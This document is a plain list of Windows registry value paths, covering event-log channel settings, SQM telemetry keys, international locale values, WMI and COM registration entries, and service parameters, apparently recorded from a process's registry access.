HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\cval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\SecurityCenter\ProviderGuid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ChannelAccess
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\DCOM\ProviderGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics\DFDCollectorInvokeTimes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxSessionSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxEventSizePerSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\AdaptiveSqm\ManifestInfo\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\SamplingInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastRunTime
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\SQMLogger\Start
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater\Id
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refresh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\ImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\advapi32.dll[MofResourceName]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\KnownSvcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ServiceParameters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\ActivationFailureLoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\CoInitializeSecurityParam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\ImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\AuthenticationCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\CoInitializeSecurityAppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\DeferredCoInitializeSecurityServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\SystemCritical
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NoResyncPerf
